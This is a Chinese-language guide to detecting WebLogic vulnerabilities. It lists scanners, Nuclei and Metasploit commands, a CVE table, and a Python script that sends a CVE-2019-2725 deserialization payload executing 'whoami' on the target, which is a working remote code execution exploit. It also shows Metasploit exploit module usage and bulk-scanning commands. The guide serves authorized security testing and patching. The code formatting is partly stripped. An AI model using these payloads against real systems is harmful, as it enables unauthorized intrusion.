WebLogic 漏洞常用检测工具

常用检测工具工具类型说明WebLogicScanner专用扫描器专注 WebLogic 漏洞检测Nuclei漏洞扫描框架支持 WebLogic 多种漏洞模板Burp Suite综合渗透测试通过插件检测 WebLogicAWVSWeb 漏洞扫描含 WebLogic 检测模块Metasploit渗透框架有多个 WebLogic exploit 模块Python 脚本自定义脚本根据 CVE 编写检测脚本️ 具体工具介绍1. WebLogicScanner推荐# Go 编写的 WebLogic 专用漏洞扫描器 # 支持 CVE-2019-2725, CVE-2020-2551, CVE-2020-14882 等 git clone https://github.com/0xn0ne/WebLogicScanner cd WebLogicScanner python webligic_scanner.py -h 目标IP -p 端口2. Nuclei推荐# 安装 nuclei -update # 使用 WebLogic 漏洞模板扫描 nuclei -u https://target:7001 -t weblogic/ # 或指定 CVE nuclei -u https://target:7001 -t cves/2020/CVE-2020-2551.yaml3. Python 手工检测脚本import requests def check_weblogic_cve_2019_2725(url): CVE-2019-2725 检测 paths [ /_async/AsyncResponseService, /wls-wsat/CoordinatorPortType ] headers { Content-Type: text/xml, SOAPAction: } payload soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ soapenv:Header work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/ void classjava.lang.ProcessBuilder array classjava.lang.String length1 void index0stringwhoami/string/void /array void methodstart//void /work:WorkContext /soapenv:Header soapenv:Body/soapenv:Body /soapenv:Envelope for path in paths: try: r requests.post(url path, datapayload, headersheaders, timeout5, verifyFalse) if r.status_code 200 or weblogic in r.text.lower(): print(f[] {url}{path} 可能存在漏洞) except: pass # 使用 check_weblogic_cve_2019_2725(http://target:7001)4. Metasploit 模块# MSF 控制台 msfconsole # 搜索 WebLogic 相关模块 search weblogic # 使用某个模块 use exploit/multi/misc/weblogic_jsf_wldf_unserialize set RHOSTS target_ip set RPORT 7001 run5. Burp Suite 专业版使用 WebLogic Scanner 扩展Burp Suite App Store或手动测试 CVE--2020-14882未授权访问GET /console/login/LoginForm.jsp HTTP/1.1 Host: target:7001 常见 WebLogic 漏洞清单CVE漏洞类型影响版本风险CVE--2020-14882未授权命令执行10.3.6 - 14.1严重CVE-2019-2725反序列化RCE10.3.6 - 12.1.3严重CVE-2020-2551IIOP 反序列化12.1.3 - 12.2.1高CVE-2018-2628T3 反序列化10.3.6 - 12.2.1高CVE-2017-3506XML Decoder10.3.6 - 12.1.3高CVE-2023-21839JNDI 注入 RCE12.2.1 - 14.1严重✅ 快速检测命令# 1. 检测 WebLogic 控制台 curl -s http://target:7001/console/login/LoginForm.jsp | grep -i weblogic # 2. 检测 T3 协议 echo t3 9.9.9 | nc -nv target 7001 # 3. 使用 nuclei 批量扫描 nuclei -l targets.txt -t cves/ -o results.txt # 4. Python 脚本批量检测 python -m pip install requests urllib3 # 使用上面提供的 Python 脚本⚠️ 注意事项授权检测 — 确保你有授权再扫描生产环境慎用 — 部分检测脚本可能触发漏洞及时打补丁 — 发现漏洞后尽快修复或升级关闭不需要的端口 — 如 T3、IIOP 协议